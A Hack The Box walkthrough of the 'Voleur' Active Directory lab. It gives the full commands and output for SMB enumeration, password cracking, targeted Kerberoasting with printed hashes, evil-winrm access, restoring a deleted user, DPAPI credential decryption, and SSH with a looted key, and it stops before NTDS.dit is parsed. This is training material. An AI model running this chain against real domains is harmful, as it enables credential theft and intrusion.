HTB | Voleur

Machine -https://app.hackthebox.com/machines/Voleur

Machine Information - As is common in real life Windows pentests, you will start the Voleur box with credentials for the following account: ryan.naylor / HollowOct31Nyt

NMAP

└─$ nmap -sC -sV -p 53,88,135,139,389,445,593,636,2222,3268,3269,5985,9389,49664,49668,49670,49671,50282,50301,64956 10.129.101.152 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-07-06 18:14 IST
Nmap scan report for 10.129.101.152
Host is up (0.82s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-06 20:45:07Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
2222/tcp  open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
|   256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_  256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
50282/tcp open  msrpc         Microsoft Windows RPC
50301/tcp open  msrpc         Microsoft Windows RPC
64956/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2025-07-06T20:46:09
|_  start_date: N/A
|_clock-skew: 8h00m03s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 132.52 seconds

Interesting SSH at port 2222 in a Windows box (probably WSL?)

Port 53

└─$ dig ANY voleur.htb @10.129.101.152

; <<>> DiG 9.20.8-6-Debian <<>> ANY voleur.htb @10.129.101.152
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48530
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;voleur.htb.                    IN      ANY

;; ANSWER SECTION:
voleur.htb.             600     IN      A       10.129.101.152
voleur.htb.             3600    IN      NS      dc.voleur.htb.
voleur.htb.             3600    IN      SOA     dc.voleur.htb. hostmaster.voleur.htb. 204 900 600 86400 3600

;; ADDITIONAL SECTION:
dc.voleur.htb.          3600    IN      A       10.129.101.152

;; Query time: 427 msec
;; SERVER: 10.129.101.152#53(10.129.101.152) (TCP)
;; WHEN: Sun Jul 06 18:19:46 IST 2025
;; MSG SIZE  rcvd: 135

SMB

└─$ netexec smb 10.129.101.152 -u 'ryan.naylor' -p 'HollowOct31Nyt' 
SMB         10.129.101.152  445    10.129.101.152   [*]  x64 (name:10.129.101.152) (domain:10.129.101.152) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.129.101.152  445    10.129.101.152   [-] 10.129.101.152\\ryan.naylor:HollowOct31Nyt STATUS_NOT_SUPPORTED

We need TGT

└─$ impacket-getTGT voleur.htb/'ryan.naylor':'HollowOct31Nyt'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in ryan.naylor.ccache

└─$ netexec smb dc.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -k
SMB         dc.voleur.htb   445    dc               [*]  x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc.voleur.htb   445    dc               [+] voleur.htb\\ryan.naylor:HollowOct31Nyt

Let’s enum shares

└─$ netexec smb dc.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -k --shares
SMB         dc.voleur.htb   445    dc               [*]  x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc.voleur.htb   445    dc               [+] voleur.htb\\ryan.naylor:HollowOct31Nyt 
SMB         dc.voleur.htb   445    dc               [*] Enumerated shares
SMB         dc.voleur.htb   445    dc               Share           Permissions     Remark
SMB         dc.voleur.htb   445    dc               -----           -----------     ------
SMB         dc.voleur.htb   445    dc               ADMIN$                          Remote Admin
SMB         dc.voleur.htb   445    dc               C$                              Default share
SMB         dc.voleur.htb   445    dc               Finance                         
SMB         dc.voleur.htb   445    dc               HR                              
SMB         dc.voleur.htb   445    dc               IPC$            READ            Remote IPC
SMB         dc.voleur.htb   445    dc               IT              READ            
SMB         dc.voleur.htb   445    dc               NETLOGON        READ            Logon server share 
SMB         dc.voleur.htb   445    dc               SYSVOL          READ            Logon server share

Smbclient was giving an error, so we will use Impacket

└─$ impacket-smbclient -k -no-pass 'voleur.htb/ryan.naylor@dc.voleur.htb'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
#

found excel file

# shares
ADMIN$
C$
Finance
HR
IPC$
IT
NETLOGON
SYSVOL
# use IT
# ls
drw-rw-rw-          0  Wed Jan 29 14:40:01 2025 .
drw-rw-rw-          0  Tue Jul  1 02:38:33 2025 ..
drw-rw-rw-          0  Wed Jan 29 15:10:17 2025 First-Line Support
# cd 'First-Line Support'
[-] SMB SessionError: code: 0xc0000034 - STATUS_OBJECT_NAME_NOT_FOUND - The object name is not found.
# cd First-Line Support
# ls
drw-rw-rw-          0  Wed Jan 29 15:10:17 2025 .
drw-rw-rw-          0  Wed Jan 29 14:40:01 2025 ..
-rw-rw-rw-      16896  Fri May 30 03:53:36 2025 Access_Review.xlsx

It is password proctected

We will use john to crack the password

└─$ office2john Access_Review.xlsx > office_hash.txt
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Voleur]
└─$ john office_hash.txt --wordlist=/home/anurag/stuff/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
football1        (Access_Review.xlsx)     
1g 0:00:00:08 DONE (2025-07-07 03:17) 0.1226g/s 97.17p/s 97.17c/s 97.17C/s football1..capricorn
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We now have cred for svc_ldap and svc_iis

Bloodhound

└─$ bloodhound-python -u 'ryan.naylor' -p 'HollowOct31Nyt' -d voleur.htb -ns 10.129.101.152 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: voleur.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.voleur.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.voleur.htb
INFO: Found 12 users
INFO: Found 56 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.voleur.htb
INFO: Done in 01M 18S
INFO: Compressing output into 20250707022800_bloodhound.zip

users

└─$ cat 20250707022800_users.json| jq -r '.data[].Properties.displayname'
null
svc_iis
svc_winrm
Jeremy Combs
svc_backup
svc_ldap
Lacey Miller
Marie Bryant
Ryan Naylor
null
null
null

From Bloodhound

REMOTE MANAGEMENT USERS contains SVC_WINRM and JEREMY.COMBS

SVC_LDAP - > WriteSPN - > SVC_WINRM

Foothold/ Shell

Shell as svc_winrm

WriteSPN

Since SVC_LDAP - > WriteSPN - > SVC_WINRM and we have SVC_LDAP password

We can use targetedKerberoast

└─$ python3 targetedKerberoast.py -d voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn --dc-host dc.voleur.htb -v -k
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (lacey.miller)
[+] Printing hash for (lacey.miller)
$krb5tgs$23$*lacey.miller$VOLEUR.HTB$voleur.htb/lacey.miller*$a2714829230703c2e497927fd306bd38$4165172c623d97af20c58606736c7b49d28d404ae98c9d2e2a7cb13c526e3647ae9c144ad2bb35a6b931a325052a6858385081694f1cc7344cc675a3eda2c42a65b3336a26cf20126bcb058a971176ae265d0a44cbbe91ac75dec00fd90846f0e96fe8f3a968b6fccb9cb08e9a12874f1888bb9db0bd1689d350b5d2a175c0934b735f9713f1ce0f637e2453b88618a824c0cdfcef1cb16af365a9759917d264b0f2b92e594641c4649c32a7013da5299fa479c91ee8b086ff6558bc6cb694717dfd9d9657072952741f3c258c6d3809beaf51d93f3d9cac20a4eae15f432ae4e962cd2b0a0b7854159583e33d3385f69591478a7ed28082d1719ea71eaf94d3f106d818c62c034e377739c1cda6ff31958f461a30f10723dd74cbdcfe232620bfe8cb2243c9f73a359ee52cc15d020908474598ef71294146e62e58e67bf3826d0624bf2f3723f112c96f06bfe43532cfa8bcf8ebe24048292f755df122af5bc7174048a5a76b19303520941f583bafc2ea05bf71fe7ec126e4577e5af461232f2a4c19ec52430ce9de07a0772cdcf8be29e71a01e5381b9d3c57deffa8e4187b7911546ea268f939ce2325c33ba320f37ae74dabf38417fdc2e02967dd4f87df345f431841fb9e9d6c37e3f2d075b5a545762568975424deed950361d372bcf98845be9785dbefc563a730bc235be4bc7539073f63dfc5c3b8ed32f8f5180745fc96e7da9b44af56391a3fd6424b438cf5414ce0587afbd2c32fdf2d60d1ced199a7a5bc7a0ebd93f02f314915f1dc6c71bbc7f8d4614321edb87ce88361eb6f6afe8493278d91c87e37b0785d702fcb0146f8f45effc5a01dacbd6388b2fde362f9f1ab391a26c760ace8d33ffb525dd8f812aba79e2021aea3da5c3851ab0bd5bccddc836ac1398654504bd4c6173195e2e4e47ea0bed2b40983e8e24f14793245efd934822a166566412f30b94409e484ea433f0ef9f33980470a248869de65d7ab2de5de5d015a4103f9d84a1cc26ffde2fa3d2b1e25fe4c597a94c4126ae95fe205a40230ae62489544c175b02ae3c17cf2e9ec8a35b38b9f2952cf307f3114d37d6372e6e4b75a06e9bdde0fe65f4a00438d4f32b55a97ced987d04b255a1d9f39bec27db93f6039477996351fabba54e79e8f4a5f17f9fa572fc3612c75d28d51dff6629d4d5614b4c0af0a87eb073adeab1f1e4503ad13a65171c7c110ee3f2a1d90827e99f95a2367a22d9b475c8215eaec257bb80dae1b2647920eb92c969006b8f88982c8812b37b15f01ef591f01542fb7b65cdaed9a693622a192e5d9026da601b756ddf53d8a4fd11e971a0674ec2c45631129e736ea81775f0ee772c9cbfc185220904c47a077bea4dfa956dc1ba7a536c3bab7c5f191a6543cf4dacba1f2c0deb5097787c361a6331e77a9e81511716143d7b6413e7346db3a7475bc92a45696ff78ec5126bbb98fc82a
[VERBOSE] SPN removed successfully for (lacey.miller)
[VERBOSE] SPN added successfully for (svc_winrm)
[+] Printing hash for (svc_winrm)
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$671662e13f20f076be23dcc0ffcb59d3$1789c136edc0416ca894260e17d2091542178ecd6ab8ca7bd5682198a36ee4aa6dc76c0ba4cdbe155315b59ffd2cddef58e7aab0b1238b12713df791b124e2c0d33605d83650c733e4865ee35399ccaf16349fd44951b5c18487bc0b90884f731cf2133e74599681747b2eff3de4c0275c8398833ec8d49a432cad2dd984fdff281ca5ea3be86dc4ae6816dfedb6012ff4d717dedd3c49ec745149e3a9a384a6b00d22ae2733bc89073c8223c9c6071ce32883532bfea8f9902b3b72b6e7163183dc4c5bc5df32c6f51c7b809fc213e8c5d7da24ce3a6428c004c2013ab3ff9c9020f54b9f67a35f2069275fcd7c388b8912070873cbfc0cf5624e3d6d44652a75c463d7fc52e1d480465aea0e9389192cd1f5cbf17e6b18333a474e71498ef850d9a3070ce8db428ac870d0c506b6a664cb13e4040a3c1f6f363f82afd6038bd9107030e069a90d74b479332572be05c95a39b0b603fd679b6043ad12120ff165898626445eb6c57b553ef4b120a0752d26f5a5d9dcb576ac914a656f02d6ddce730f2e9e47614ee70161b5de4db0aff7f93a77dd26bbdbb8bd056f047cdb2112385c2acf99c66d02b9ccb725b3d69318f71bd704855d5a5e68b2c82d2c50151e80a777c3e6f62346f2affd8f6424257d4a8c1d74354922c02bafd75396578b2b90de473b8be01440cc5affd27364eb630aecd419c3a7cb1f7e4d2068b73eecd77cc19a93f07324dd340a7e6a7c2d4655e669b808fc3ffd4cff8f97c1257896151773834d2718623070d2552b2d4bd7c873d905899d65d272392d49a54bb71411265d6e4eb7f8a905bba04579d23bb1b6afbcc065ee7859eaadb480cd006900b494fcc28b47c0dac885d19ba07c439cfb604e02df9a61324be7617a2ecf8e01ce924017b7f6ecb386f7b9deb249a42b7cd40170f3e65776938fb234b6f2bf2ca9761390cef84e8f3e9ce4931ba65802daf6740761830c5feab081e0e5f68577811740d0824dd8b0657697434dedfc0067f75171d5cffe52ef728d39bde685931d0a4508ae4a9d9ea9d8b7d75bebce836d0baf8e00f359a042f33fd3cf70fd203267a0bb8581b92a7c4ed492c851a0b9631bb8f7bed1ec308d9d7e42c79641e632b917a6a1ec7e520815e81c8ab1dd9f8d9f57665bf1622c141cf49346609a8b861e37cfc7e7cfb574a016a113bfd924628ed5051e3e7fe5e377565d931ccb8a5708cff390c7ce829664b21177bf9cd94b63dfec161fb82d0cdcb3715c5ec91c31c7e2e798839bc7bcc374f8da2f31ad7cff9b16052f511b0fee636a8e58dac20f3d6500e163e0b8dd7d92182b74eca02d3e885925903a20e979ce56c88ca44fd2eef22cf87e6617e3eee23dace0e293fd8dbd33c7660fbfe459db00a6d817cf3d955245acd6585e5e3eed855a722d6273c84a4e4ce2ed81daddf58306a7a2a6c893d40be59954b9bc1a3e10b81e14bb027f7c
[VERBOSE] SPN removed successfully for (svc_winrm)

Crack the svc_winrm TGS-REP hash

we will use hashcat for cracking

└─$ hashcat svc.winrm.hash /home/anurag/stuff/rockyou.txt

and we get that password for svc_winrm

we can get the shell but first let’s forge TGT for svc_winrm

┌──(anurag㉿anurag)-[~/htb/Voleur]
└─$ impacket-getTGT voleur.htb/'svc_winrm':'AFireInsidedeOzarctica980219afi'                
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in svc_winrm.ccache
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Voleur]
└─$ export KRB5CCNAME=svc_winrm.ccache

┌──(anurag㉿anurag)-[~/htb/Voleur]
└─$ export KRB5_CONFIG=./krb5.conf           
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Voleur]
└─$ evil-winrm -i dc.voleur.htb -r voleur.htb
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\svc_winrm\\Documents>

and we have user.txt


    Directory: C:\\Users\\svc_winrm\\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/29/2025   7:07 AM           2312 Microsoft Edge.lnk
-ar---          7/7/2025   8:47 AM             34 user.txt

Privilege Escalation

Shell as Administrator

Restoring todd.wolfe

Since svc_ldap is a MemberOf RESTORE_USERS and from the excel we know there is a deleted user

First Let’s try to get shell as svc_ldap

PSSession did not worked

*Evil-WinRM* PS C:\\Users\\svc_winrm\\Documents> $password = ConvertTo-SecureString "M1XyC9pW7qT5Vn" -AsPlainText -Force
*Evil-WinRM* PS C:\\Users\\svc_winrm\\Documents> $cred = New-Object System.Management.Automation.PSCredential("svc_ldap", $password)
*Evil-WinRM* PS C:\\Users\\svc_winrm\\Documents> hostname
DC
*Evil-WinRM* PS C:\\Users\\svc_winrm\\Documents> Enter-PSSession -ComputerName dc -Credential $cred
You are currently in a Windows PowerShell PSSession and cannot use the Enter-PSSession cmdlet to enter another PSSession.
At line:1 char:1
+ Enter-PSSession -ComputerName dc -Credential $cred
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [Enter-PSSession], ArgumentException
    + FullyQualifiedErrorId : RemoteHostDoesNotSupportPushRunspace,Microsoft.PowerShell.Commands.EnterPSSessionCommand

Now there are two ways, first is to use RunasC and get access as svc_ldap and then check for deleted objects and restore and the second is via bloodyad. We will be using bloodyad (refer to rustykey for login as RunAsC and Tombwatcher for AD cmd)

We can now search for deleted objects from the svc_ldap creds:

└─$ bloodyAD --host DC.voleur.htb -d voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -k get search -c 1.2.840.113556.1.4.417 --filter '(isDeleted=TRUE)' --attr lastKnownParent,msDS-LastKnownRDN,sAMAccountName

distinguishedName: CN=Deleted Objects,DC=voleur,DC=htb

distinguishedName: CN=Todd Wolfe\\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb
lastKnownParent: OU=Second-Line Support Technicians,DC=voleur,DC=htb
msDS-LastKnownRDN: Todd Wolfe
sAMAccountName: todd.wolfe

We need to check the security descriptors of Todd Wolfe tombstone to learn if svc_ldap has write access over the necessary attributes:

└─$ bloodyAD --host DC.voleur.htb -d voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -k get search -c 1.2.840.113556.1.4.417 --filter '(isDeleted=TRUE)' --attr ntsecuritydescriptor --resolve-sd

<--SNIP-->
nTSecurityDescriptor.ACL.13.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.13.Trustee: Restore_Users
nTSecurityDescriptor.ACL.13.Right: WRITE_PROP|CREATE_CHILD
nTSecurityDescriptor.ACL.13.ObjectType: Self
nTSecurityDescriptor.ACL.13.Flags: CONTAINER_INHERIT; INHERITED
<--SNIP>>

Now we can restore the object

└─$ bloodyAD --host DC.voleur.htb -d voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -k set restore todd.wolfe
[+] todd.wolfe has been restored successfully under CN=Todd Wolfe,OU=Second-Line Support Technicians,DC=voleur,DC=htb

From the excel we have the cred of todd

SMB as todd

todd.wolfe is a member of the groups Remote Management Users and Second-Line Technicians.

└─$ netexec ldap DC.voleur.htb -d voleur.htb -u 'todd.wolfe' -p 'NightT1meP1dg3on14' -k -M whoami 
LDAP        DC.voleur.htb   389    DC               [*] None (name:DC) (domain:voleur.htb)
LDAP        DC.voleur.htb   389    DC               [+] voleur.htb\\todd.wolfe:NightT1meP1dg3on14 
WHOAMI      DC.voleur.htb   389    DC               description: Second-Line Support Technician
WHOAMI      DC.voleur.htb   389    DC               distinguishedName: CN=Todd Wolfe,OU=Second-Line Support Technicians,DC=voleur,DC=htb
WHOAMI      DC.voleur.htb   389    DC               Member of: CN=Second-Line Technicians,DC=voleur,DC=htb
WHOAMI      DC.voleur.htb   389    DC               Member of: CN=Remote Management Users,CN=Builtin,DC=voleur,DC=htb
WHOAMI      DC.voleur.htb   389    DC               name: Todd Wolfe
WHOAMI      DC.voleur.htb   389    DC               Enabled: Yes
WHOAMI      DC.voleur.htb   389    DC               Password Never Expires: Yes
WHOAMI      DC.voleur.htb   389    DC               Last logon: 133963940069858032
WHOAMI      DC.voleur.htb   389    DC               pwdLastSet: 133826280731790960
WHOAMI      DC.voleur.htb   389    DC               logonCount: 4
WHOAMI      DC.voleur.htb   389    DC               sAMAccountName: todd.wolfe

not able to login, but got smb access

─$ impacket-getTGT voleur.htb/'todd.wolfe':'NightT1meP1dg3on14'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in todd.wolfe.ccache

└─$ export KRB5CCNAME=todd.wolfe.ccache  

└─$ netexec smb DC.voleur.htb -d voleur.htb -u 'todd.wolfe' -p 'NightT1meP1dg3on14' -k --shares
SMB         DC.voleur.htb   445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         DC.voleur.htb   445    DC               [+] voleur.htb\\todd.wolfe:NightT1meP1dg3on14 
SMB         DC.voleur.htb   445    DC               [*] Enumerated shares
SMB         DC.voleur.htb   445    DC               Share           Permissions     Remark
SMB         DC.voleur.htb   445    DC               -----           -----------     ------
SMB         DC.voleur.htb   445    DC               ADMIN$                          Remote Admin
SMB         DC.voleur.htb   445    DC               C$                              Default share
SMB         DC.voleur.htb   445    DC               Finance                         
SMB         DC.voleur.htb   445    DC               HR                              
SMB         DC.voleur.htb   445    DC               IPC$            READ            Remote IPC
SMB         DC.voleur.htb   445    DC               IT              READ            
SMB         DC.voleur.htb   445    DC               NETLOGON        READ            Logon server share 
SMB         DC.voleur.htb   445    DC               SYSVOL          READ            Logon server share

we found that we have access to home directory backup of todd.wolfe

└─$ impacket-smbclient -k -no-pass 'voleur.htb/todd.wolfe@dc.voleur.htb'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# use IT
# ls
drw-rw-rw-          0  Wed Jan 29 14:40:01 2025 .
drw-rw-rw-          0  Tue Jul  1 02:38:33 2025 ..
drw-rw-rw-          0  Wed Jan 29 20:43:03 2025 Second-Line Support
# cd Second-Line Support
# ls
drw-rw-rw-          0  Wed Jan 29 20:43:03 2025 .
drw-rw-rw-          0  Wed Jan 29 14:40:01 2025 ..
drw-rw-rw-          0  Wed Jan 29 20:43:06 2025 Archived Users
# cd Archived Users
# ls
drw-rw-rw-          0  Wed Jan 29 20:43:06 2025 .
drw-rw-rw-          0  Wed Jan 29 20:43:03 2025 ..
drw-rw-rw-          0  Wed Jan 29 20:43:16 2025 todd.wolfe
# cd todd.wolfe
# ls
drw-rw-rw-          0  Wed Jan 29 20:43:16 2025 .
drw-rw-rw-          0  Wed Jan 29 20:43:06 2025 ..
drw-rw-rw-          0  Wed Jan 29 20:43:06 2025 3D Objects
drw-rw-rw-          0  Wed Jan 29 20:43:09 2025 AppData
drw-rw-rw-          0  Wed Jan 29 20:43:10 2025 Contacts
drw-rw-rw-          0  Thu Jan 30 19:58:50 2025 Desktop
drw-rw-rw-          0  Wed Jan 29 20:43:10 2025 Documents
drw-rw-rw-          0  Wed Jan 29 20:43:10 2025 Downloads
drw-rw-rw-          0  Wed Jan 29 20:43:10 2025 Favorites
drw-rw-rw-          0  Wed Jan 29 20:43:10 2025 Links
drw-rw-rw-          0  Wed Jan 29 20:43:10 2025 Music
-rw-rw-rw-      65536  Wed Jan 29 20:43:06 2025 NTUSER.DAT{c76cbcdb-afc9-11eb-8234-000d3aa6d50e}.TM.blf
-rw-rw-rw-     524288  Wed Jan 29 18:23:07 2025 NTUSER.DAT{c76cbcdb-afc9-11eb-8234-000d3aa6d50e}.TMContainer00000000000000000001.regtrans-ms
-rw-rw-rw-     524288  Wed Jan 29 18:23:07 2025 NTUSER.DAT{c76cbcdb-afc9-11eb-8234-000d3aa6d50e}.TMContainer00000000000000000002.regtrans-ms
-rw-rw-rw-         20  Wed Jan 29 18:23:07 2025 ntuser.ini
drw-rw-rw-          0  Wed Jan 29 20:43:10 2025 Pictures
drw-rw-rw-          0  Wed Jan 29 20:43:10 2025 Saved Games
drw-rw-rw-          0  Wed Jan 29 20:43:10 2025 Searches
drw-rw-rw-          0  Wed Jan 29 20:43:10 2025 Videos
#

Parsing DPAPI from user's home directory to get jeremy.combs

Since we find nothing but in AppData, we might find DPAPI related files. And as we know this user's password, we'll be able to extract the masterkey and decipher his stored credentials.

DPAPI masterkeys are generally stored in the following directories:

%HOME%\AppData\Roaming\Microsoft\Protect\<UserSID>\
%HOME%\AppData\Local\Microsoft\Protect\<UserSID>\

Here, we find one:

%HOME%\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88

Once we have the masterkey file, we need the encrypted blobs, generally found in the following directories:

%HOME%\AppData\Roaming\Microsoft\Credentials\
%HOME%\AppData\Local\Microsoft\Credentials\

Here, we find one:

%HOME%\AppData\Roaming\Microsoft\Credentials\772275FAD58525253490A9B0039791D3

After downloading these files, we can use impacket's dpapi.py to decrypt the masterkey and decrypt the blob:

└─$ impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -password NightT1meP1dg3on14 -sid S-1-5-21-3927696377-1337352550-2781715495-1110
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

└─$ impacket-dpapi credential -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83 -file 772275FAD58525253490A9B0039791D3 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19+00:00
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=Jezzas_Account
Description : 
Unknown     : 
Username    : jeremy.combs
Unknown     : qT3V9pLXyN7W4m

SMB via jeremy.combs

We remember from our initial enumeration that jeremy.combs is in the Third-Line Technicians group.

└─$ impacket-getTGT voleur.htb/'jeremy.combs':'qT3V9pLXyN7W4m'                                                                                                                                    
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in jeremy.combs.ccache
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Voleur]
└─$ export KRB5CCNAME=jeremy.combs.ccache    
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Voleur]
└─$ impacket-smbclient -k -no-pass 'voleur.htb/jeremy.combs@dc.voleur.htb'                                                                                                                        
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# use IT
# cd 
.                   ..                  Third-Line Support  
# cd Third-Line Support
# ls
drw-rw-rw-          0  Thu Jan 30 21:41:29 2025 .
drw-rw-rw-          0  Wed Jan 29 14:40:01 2025 ..
-rw-rw-rw-       2602  Thu Jan 30 21:41:29 2025 id_rsa
-rw-rw-rw-        186  Thu Jan 30 21:37:35 2025 Note.txt.txt
# get id_rsa
# get Note.txt.txt
# exit

└─$ cat Note.txt.txt 
Jeremy,

I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.

Please see what you can set up.

Thanks,

Admin

The Note confirms the probable use of WSL (port 2222).

SHH as svc_backup

┌──(anurag㉿anurag)-[~/htb/Voleur]
└─$ chmod 600 id_rsa   
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Voleur]
└─$ ssh -i id_rsa svc_backup@voleur.htb -p 2222                        
The authenticity of host '[voleur.htb]:2222 ([10.129.242.78]:2222)' can't be established.
ED25519 key fingerprint is SHA256:mKWAEwLTnEN2bJNi7fkc+BZodiXCIiP3ywSLJiZL0ss.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[voleur.htb]:2222' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 4.4.0-20348-Microsoft x86_64)

 * Documentation:  <https://help.ubuntu.com>
 * Management:     <https://landscape.canonical.com>
 * Support:        <https://ubuntu.com/advantage>

  System information as of Mon Jul  7 14:07:46 PDT 2025

  System load:    0.52      Processes:             9
  Usage of /home: unknown   Users logged in:       0
  Memory usage:   34%       IPv4 address for eth0: 10.129.242.78
  Swap usage:     0%

363 updates can be installed immediately.
257 of these updates are security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu Jan 30 04:26:24 2025 from 127.0.0.1
 * Starting OpenBSD Secure Shell server sshd                                                                                                                                                                                                                           [ OK ] 
svc_backup@DC:~$

Finding NTDS.dit backup, parsing it and getting root

In these configurations, the windows drives are mounted in /mnt.

svc_backup@DC:/mnt/c$ ls
ls: cannot access 'DumpStack.log.tmp': Permission denied
